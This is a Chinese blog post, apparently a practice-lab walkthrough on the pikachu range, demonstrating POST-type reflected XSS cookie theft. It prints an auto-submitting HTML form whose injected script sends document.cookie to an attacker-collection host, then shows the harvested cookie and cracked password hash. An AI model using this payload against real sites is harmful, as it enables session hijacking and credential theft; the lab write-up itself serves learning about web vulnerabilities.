web渗透测试-从入门到放弃-04XSS-Cookie-POST利用

最新推荐文章于 2023-10-05 14:39:46 发布
最新推荐文章于 2023-10-05 14:39:46 发布
阅读量525 收藏
点赞数
分类专栏: Web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lx1315998513/article/details/102848886
版权

POST型XSS的利用:cookie获取

用户——>Request伪造页面,触发表单——>攻击者伪造表单自动提交页面(一个当用户访问这个就会触发js脚本窃取cookie信息给攻击者后台的链接)——>存在post型XSS漏洞的网站
伪造的自动提交页面的代码(在pikachu网站中可以搜索找到):
post.html:

<html>
<head>
<script>
window.onload = function() {
  document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form method="post" action="http://127.0.0.1/pikachu/vul/xss/xsspost/xss_reflected_post.php">
    <input id="xssr_in" type="text" name="message" value=
    "<script>
document.location = 'http://192.168.10.130/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;   这里的ip是后台接受cookie的主机
	</script>"
	 />
    <input id="postsubmit" type="submit" name="submit" value="submit" />
</form>
</body>
</html>

192.168.43.229是我主机的IP地址,以下是我们构造用户访问的链接

http://192.168.43.229/pikachu/pkxss/xcookie/post.html

我们来到反射型xss-post,我们这里输入admin,123456登陆
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Ha3C3vGE-1572541290336)(C:\Users\嘻嘻嘻\AppData\Roaming\Typora\typora-user-images\1572540861251.png)]现在用户是登陆状态,然后我们模拟用户访问了一个我们发送的post.html的链接(浏览器新建标签页)
在这里插入图片描述在这里插入图片描述然后页面重定向到了首页
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-T5AP4RMN-1572541290338)(C:\Users\嘻嘻嘻\AppData\Roaming\Typora\typora-user-images\1572541029389.png)]我们再回到ip为:192.168.10.130的后台页面刷新
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-XSU7lOcE-1572541290339)(C:\Users\嘻嘻嘻\AppData\Roaming\Typora\typora-user-images\1572541078657.png)]在这里可以看到获取到的cookie值:

ant[uname]=admin; ant[pw]=10470c3b4b1fed12c3baac014be15fac67c6e815; PHPSESSID=3vtjdj8v0c2p15437m56tsdqe3

其中uname,用户名是admin,pw是10470c3b4b1fed12c3baac014be15fac67c6e815,这一串使用md5解密后是123456。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bMaxQ69I-1572541290340)(C:\Users\嘻嘻嘻\AppData\Roaming\Typora\typora-user-images\1572541248855.png)]

林⁣熙
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss盲打(通过xss盲打盗取管理员账号和密码!)
qq_43814486的博客
05-03 6520
原理: 其实和一般的xss原理是一样的,不同的地方在于xss盲打的结果你看不到,你不知道它是否存在xss漏洞,因为xss盲打的结果是显示在管理员后端的,但是这并不意味着不存在xss漏洞!只要payload被执行,就存在漏洞! 上面说了一大堆,现在来点干东西!我要通过xss盲打这种漏洞盗取他们管理员的账号和密码!!!操作如下: 1,我输入的payload: <script>documen...
007-Web安全基础3---XSS漏洞(CISP-PTE).pptx
10-18
007-Web安全基础3---XSS漏洞(CISP-PTE).pptx
CISP-PTE注册信息安全专业人员渗透测试工程师-认证课件资料
最新发布
01-30
CISP-PTE注册信息安全专业人员渗透测试工程师-认证课件资料:2个版本,共25个课件文件 01.WEB安全简介 02.信息收集 03.漏洞扫描 04.HTTP协议 05.SQL注入之基础篇 07.暴力破解 08.文件上传漏洞 09.命令执行漏洞 10.文件包含漏洞 11.社会工程学 12.ARP欺骗 13.xss跨站脚本漏洞 14.CSRF跨站请求伪造 15.SSRF
WEB渗透学习-XSS-labs靶场
04-20
XSS-labs为WEB渗透中跨站脚本攻击专项练习靶场,内含多种攻击方式,采用关卡制,由易到难,适合刚接触该漏洞的新手巩固练习
利用Express模拟web安全之---xss的攻与防
01-26
跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的, 还有另外一种产常见的就是CSRF(后面讲到)。
SQL注入---Cookie注入
arissa666的博客
07-16 140
cookie里面的ant[pw]=10470c3b4b1fed12c3baac014be15fac67c6e815是加密密码,解密一下就可以得到账户密码。在cookie位置用'看下有没有报错,报错说明有注入点。原始cookie是账户admin,cmd5编译的密码。有注入点说明可以插入语句,输入语句。
bladex密码
DynastyTing的专栏
02-28 1341
System.out.println("密码为:"+ DigestUtil.md5Hex("123456"));//e10adc3949ba59abbe56e057f20f883e 前端传: md5的值为 System.out.println("密码为:"+ DigestUtil.hex(DigestUtil.md5Hex("123456")));//10470c3b4b1fed12c3baac014be15fac67c6e815 数据库密码 System.out.println("密码为:"+ .
springboot实现用户统一认证、管理
穆雄雄的博客
06-02 1055
“大家好,我是雄雄,欢迎关注微信公众号:雄雄的小课堂”前言现在是:2022年5月25日13:44:16最近和模拟登录杠上了,这不,又来了个需求,还是以这个技术点入手的。需求大概是这样的:为了统一管理系统的用户,上游平台做了个统一认证平台,所有用户进入子系统只有一个入口,即:上游平台登录入口,新用户也是上游平台进行添加;子系统的用户登录和注册模块都屏蔽掉。设计技能点前端:V...
小破站【pikachu 皮卡丘渗透靶场】 之 SQL注入 自学全套笔记
algae
04-16 4074
sql.txt大纲 数字型测试: $id=$_POST['id'] select 字段1,字段2 from 表名 where id = 1 or 1=1; 字符型测试: $uname=$_GET['username'] select 字段1,字段2 from 表名 where username='kobe' or 1=1#'; 搜索型测试: like '%%' ...
Kali Linux Web渗透测试手册(第二版) - 2.7 - 获取和修改cookie
weixin_30609287的博客
11-29 182
标记红色的部分为今日更新内容。 第二章:侦察 介绍 2.1、被动信息收集 2.2、使用Recon-ng收集信息 2.3、使用Nmap扫描和识别应用服务 2.4、识别web应用防火墙 2.5、识别HTTPS加密参数 2.6、使用浏览器自带的开发工具来做基本的分析和修改 2.7、获取和修改cookie 2.8、利用robots.txt 2.7、获取...
WEB渗透学习笔记5——宽字节、Cookie、base64注入
林林木林林L的博客
07-29 353
SQL注入防御绕过——宽字节注入 原因 由于sql注入的盛行,不少网站管理员都意识到了这种攻击方式的厉害,纷纷想出不少办法来避免,例如使用一些 Mysql 中转义的函数 addslashes,mysql_real_escape_string, mysql_escape_string等等。其实这些函数就是为了过滤用户输入的一些数据,对特殊的字符加上反斜杠“\”进行转义。 Addslashes()函数:对get、postcookie等传递的参数中的’、“、\、null等进行转义 mysql_real_esc
【推荐】渗透测试工程师(CISP-PTE)认证培训课件资料合集(18份).zip
11-29
007-Web安全基础3 - XSS漏洞.pptx 008-Web安全基础4 - 请求伪造漏洞.pptx 009-Web安全基础5 - 文件处理漏洞.pptx 010-Web安全基础6 - 访问控制漏洞.pptx 011-Web安全基础7 - 会话管理漏洞.pptx 012-Web安全基础8 - ...
2022 浙江刑技比武 研判分析客观 服务器题解 Windows+Linux
Grignard_的博客
10-31 1526
2022 浙江刑技比武 研判分析客观 服务器题解 Windows+Linux 网站重构 iis 日志
【网络安全 --- XSS漏洞利用实战】你知道如何利用XSS漏洞进行cookie获取,钓鱼以及键盘监听吗?--- XSS实战篇
m0_67844671的博客
10-05 2079
你知道xss漏洞如何利用吗?本篇文章详细介绍了利用XSS漏洞如何实现cookie盗取,钓鱼获取用户名密码以及监听键盘记录等,让你对xss漏洞有进一步认识。
cookie
weixin_45307185的博客
09-29 244
1、cookie的作用: 我们在浏览器中,经常涉及到数据的交换,比如你登录邮箱,登录一个页面。我们经常会在此时设置30天内记住我,或者自动登录选项。那么它们是怎么记录信息的呢,答案就是今天的主角cookie了,Cookie是由HTTP服务器设置的,保存在浏览器中,但HTTP协议是一种无状态协议,在数据交换完毕后,服务器端和客户端的链接就会关闭,每次交换数据都需要建立新的链接。就像我们去超市...
渗透测试之数据库注入——cookie注入
weixin_48803011的博客
12-13 623
cookie注入就是数据库注入的一种;cookie会记录我们的一些信息以方便我们的体验更佳。但这也给网站造成了一定的风险。
渗透测试-跨站脚本攻击xss之获取cookie
lza20001103的博客
04-24 4573
渗透测试-跨站脚本攻击xss之获取cookie
DVWA——XSS(Reflected)——多种方法实现+详细步骤图解+获取cookie利用过程演示
热门推荐
weixin_46709219的博客
01-25 1万+
一)XSS(Reflected)介绍: 反射型xss(非持久型):需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。特点:弹窗警告、广告;javascript;在浏览器中执行。 通过Web站点漏洞,向客户交付恶意脚本代码,实现对客户端的攻击;恶意攻击者往Web页面里插入恶意的 Script 代码,当用户浏览该页面时,嵌入其中 Web 里面的 Script 代码就会被执行,从而达到恶意攻击用户的目的;注入客户端脚本代码、盗取cookie、重定向等。 二)实际
Web安全渗透OWASP-DVWA-SQL注入攻击
lx1315998513的博客
12-13 2504
SQL注入攻击 在owasp年度top10安全问题中,注入高居榜首,SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者索要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 一、回顾SQL语句 1.登陆owasp mysql -uroot -powaspbwa -u账户,-p密码...
web安全之kali-xss-beef剑心哥哥
12-24
Kali Linux是一种用于网络安全测试和渗透测试的操作系统,它具有强大的工具和功能,可以用于检测和解决网站的安全漏洞。XSS(跨站脚本攻击)是一种常见的网络安全漏洞,可以通过在网页中插入恶意脚本来获取用户的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值